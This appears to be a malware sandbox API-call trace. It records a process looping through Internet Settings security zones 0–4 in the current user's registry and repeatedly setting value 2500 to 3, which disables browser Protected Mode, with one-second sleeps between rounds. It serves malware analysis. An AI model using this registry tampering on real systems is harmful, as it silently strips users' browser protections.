	[0119.856] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.856] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.856] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.856] RegCloseKey (hKey=0x698) returned 0x0
	[0119.857] Sleep (dwMilliseconds=0x3e8) 
	[0119.860] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.860] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.860] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.860] RegCloseKey (hKey=0x698) returned 0x0
	[0119.860] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.860] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.860] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.860] RegCloseKey (hKey=0x698) returned 0x0
	[0119.860] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.860] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.860] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.860] RegCloseKey (hKey=0x698) returned 0x0
	[0119.860] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.860] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.860] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.860] RegCloseKey (hKey=0x698) returned 0x0
	[0119.860] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.860] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.860] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.861] RegCloseKey (hKey=0x698) returned 0x0
	[0119.861] Sleep (dwMilliseconds=0x3e8) 
	[0119.862] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.862] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.862] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.862] RegCloseKey (hKey=0x698) returned 0x0
	[0119.862] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.862] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.862] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.862] RegCloseKey (hKey=0x698) returned 0x0
	[0119.863] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.863] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.863] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.863] RegCloseKey (hKey=0x698) returned 0x0
	[0119.863] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.863] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.863] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.863] RegCloseKey (hKey=0x698) returned 0x0
	[0119.863] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.863] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.863] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.863] RegCloseKey (hKey=0x698) returned 0x0
	[0119.863] Sleep (dwMilliseconds=0x3e8) 
	[0119.882] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.882] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.883] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.883] RegCloseKey (hKey=0x698) returned 0x0
	[0119.883] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.883] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.883] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.883] RegCloseKey (hKey=0x698) returned 0x0
	[0119.883] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.883] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.883] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.883] RegCloseKey (hKey=0x698) returned 0x0
	[0119.883] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.883] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.883] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.883] RegCloseKey (hKey=0x698) returned 0x0
	[0119.883] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.883] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.883] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.884] RegCloseKey (hKey=0x698) returned 0x0
	[0119.884] Sleep (dwMilliseconds=0x3e8) 
	[0119.886] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.886] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.886] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.886] RegCloseKey (hKey=0x698) returned 0x0
	[0119.886] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.886] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.886] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.886] RegCloseKey (hKey=0x698) returned 0x0
	[0119.886] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.886] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.886] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.886] RegCloseKey (hKey=0x698) returned 0x0
	[0119.886] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.886] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.886] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.886] RegCloseKey (hKey=0x698) returned 0x0
	[0119.887] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.887] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.887] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.887] RegCloseKey (hKey=0x698) returned 0x0
	[0119.887] Sleep (dwMilliseconds=0x3e8) 
	[0119.888] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.888] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.888] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.888] RegCloseKey (hKey=0x698) returned 0x0
	[0119.888] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.888] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.888] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.888] RegCloseKey (hKey=0x698) returned 0x0
	[0119.889] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.889] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.889] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.889] RegCloseKey (hKey=0x698) returned 0x0
	[0119.889] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.889] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.889] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.889] RegCloseKey (hKey=0x698) returned 0x0
	[0119.889] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.889] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.889] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.891] RegCloseKey (hKey=0x698) returned 0x0
	[0119.891] Sleep (dwMilliseconds=0x3e8) 
	[0119.892] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.892] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.892] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.892] RegCloseKey (hKey=0x698) returned 0x0
	[0119.892] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.892] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.893] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.893] RegCloseKey (hKey=0x698) returned 0x0
	[0119.893] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.893] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.893] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.893] RegCloseKey (hKey=0x698) returned 0x0
	[0119.893] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.893] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.893] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.893] RegCloseKey (hKey=0x698) returned 0x0
	[0119.893] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.893] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.893] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.893] RegCloseKey (hKey=0x698) returned 0x0
	[0119.893] Sleep (dwMilliseconds=0x3e8) 
	[0119.895] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.895] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.895] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.895] RegCloseKey (hKey=0x698) returned 0x0
	[0119.895] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.895] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.895] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.895] RegCloseKey (hKey=0x698) returned 0x0
	[0119.895] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.895] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.895] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.896] RegCloseKey (hKey=0x698) returned 0x0
	[0119.896] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.896] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.896] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.896] RegCloseKey (hKey=0x698) returned 0x0
	[0119.896] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.896] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.896] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.896] RegCloseKey (hKey=0x698) returned 0x0
	[0119.896] Sleep (dwMilliseconds=0x3e8) 
	[0119.898] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.898] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.898] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.898] RegCloseKey (hKey=0x698) returned 0x0
	[0119.898] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.898] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.898] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.898] RegCloseKey (hKey=0x698) returned 0x0
